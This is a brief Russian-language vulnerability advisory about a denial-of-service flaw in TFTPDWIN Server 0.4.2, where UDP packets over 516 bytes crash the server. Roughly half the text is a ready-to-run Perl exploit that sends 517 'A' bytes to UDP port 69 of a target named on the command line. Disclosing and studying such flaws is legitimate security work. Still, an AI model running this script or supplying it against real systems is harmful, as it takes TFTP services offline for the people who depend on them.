Программа: TFTPDWIN Server 0.4.2

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных при обработке UDP пакетов. Атакующий может передать специально сформированные UDP пакеты длинной более 516 байт, что приведет к отказу сервера в обслуживании.

Эксплоит:

use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "69",
Proto    => "UDP"))
{
print $socket "A" x 517;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:69\n";
}



Оставить мнение